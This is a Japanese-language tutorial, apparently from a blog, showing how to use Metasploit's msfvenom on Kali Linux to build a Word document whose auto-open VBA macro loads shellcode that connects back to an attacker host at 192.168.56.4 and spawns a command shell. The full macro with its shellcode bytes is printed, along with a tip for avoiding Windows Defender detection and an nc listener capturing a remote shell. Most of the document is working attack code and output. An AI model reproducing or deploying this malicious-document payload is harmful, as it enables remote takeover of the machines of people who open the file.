Metasploitを使ってconnect-back shellを起動するWord文書を作ってみる
「電卓を起動するWord文書を作ってみる」では、簡単なVBAマクロを使って電卓を起動するWord文書を作成した。 VBAマクロではWin32 APIを呼ぶことができるため、任意のシェルコードを実行するマクロを書くことができる。 ここでは、Metasploit Frameworkを使ってconnect-back shellを起動するWord文書を作ってみる。
環境
Kali Linux 2.0、Metasploit Framework 4.11.4
root@vm-kali64:~# uname -a Linux vm-kali64 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux root@vm-kali64:~# lsb_release -a No LSB modules are available. Distributor ID: Kali Description: Kali GNU/Linux 2.0 Release: 2.0 Codename: sana root@vm-kali64:~# msfconsole -v Framework Version: 4.11.4-2015071403
MetasploitでVBAマクロを生成してみる
Metasploitではシェルコードの出力形式としてVBAを選ぶことができ、これはそのままOfficeマクロとして使えるものになっている。
まず、msfvenomコマンドを使ってペイロード名や指定可能なオプションを調べてみる。
root@vm-kali64:~# msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder <encoder> The encoder to use
-a, --arch <arch> The architecture to use
--platform <platform> The platform of the payload
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
root@vm-kali64:~# msfvenom -l
Framework Payloads (432 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
...
windows/shell_reverse_tcp Connect back to attacker and spawn a command shell
...
root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp --payload-options
Options for payload/windows/shell_reverse_tcp:
Name: Windows Command Shell, Reverse TCP Inline
Module: payload/windows/shell_reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 324
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Advanced options for payload/windows/shell_reverse_tcp:
(snip)
上で調べた結果をもとに、192.168.56.4の4444番ポートにconnect-backするVBAマクロを生成すると次のようになる。
root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.4 LPORT=4444 EXITFUNC=thread -f vba
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As LongPtr, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As LongPtr, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As Long, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As Long, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As Long
#EndIf
Sub Auto_Open()
Dim Ewtoup As Long, Qkhfci As Variant, Kdhhfhp As Long
#If Vba7 Then
Dim Hhluw As LongPtr, Lgcpy As LongPtr
#Else
Dim Hhluw As Long, Lgcpy As Long
#EndIf
Qkhfci = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,56,4,104,2,0,17,92,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,104,99,109,100,0,137,227,87,87,87,49,246,106, _
18,89,86,226,253,102,199,68,36,60,1,1,141,68,36,16,198,0,68,84, _
80,86,86,86,70,86,78,86,86,83,86,104,121,204,63,134,255,213,137,224, _
78,86,70,255,48,104,8,135,29,96,255,213,187,224,29,42,10,104,166,149, _
189,157,255,213,60,6,124,10,128,251,224,117,5,187,71,19,114,111,106,0, _
83,255,213)
Hhluw = VirtualAlloc(0, UBound(Qkhfci), &H1000, &H40)
For Kdhhfhp = LBound(Qkhfci) To UBound(Qkhfci)
Ewtoup = Qkhfci(Kdhhfhp)
Lgcpy = RtlMoveMemory(Hhluw + Kdhhfhp, Ewtoup, 1)
Next Kdhhfhp
Lgcpy = CreateThread(0, 0, Hhluw, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
上の結果のうち、#If Vba7 Then以降が出力されたマクロとなる。
このマクロは、文書が開かれたタイミングで動作する。
具体的には、VirtualAlloc関数とRtlMoveMemory関数でメモリ上にシェルコードを配置し、CreateThread関数でこれを新たなスレッドで実行する。
ここで、デフォルトのEXITFUNC=processではシェルコードの最後にWordのプロセス自体を終了してしまうため、生成時にEXITFUNC=threadを指定していることに注意する。
マクロが埋め込まれたWord文書を作ってみる
「電卓を起動するWord文書を作ってみる」と同様にして、上のマクロを含むWord文書を作成する。 なお、このファイルはWindows DefenderでTrojanDownloader:O97M/Donoff.gen!Aとして検知されるため、Windows Defenderの除外フォルダの中に作成する必要がある。
ncコマンドを使い192.168.56.4の4444番ポートで待ち受けた状態で、Word文書を開きマクロを有効にすると次のようになる。
root@vm-kali64:~# nc -v -l -p 4444 listening on [any] 4444 ... 192.168.56.1: inverse host lookup failed: Unknown host connect to [192.168.56.4] from (UNKNOWN) [192.168.56.1] 58116 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\user\Desktop>whoami whoami target-win8\user C:\Users\user\Desktop>^C
上の結果より、リモートからWord文書を開いた端末のコマンドプロンプトが操作できていることが確認できる。
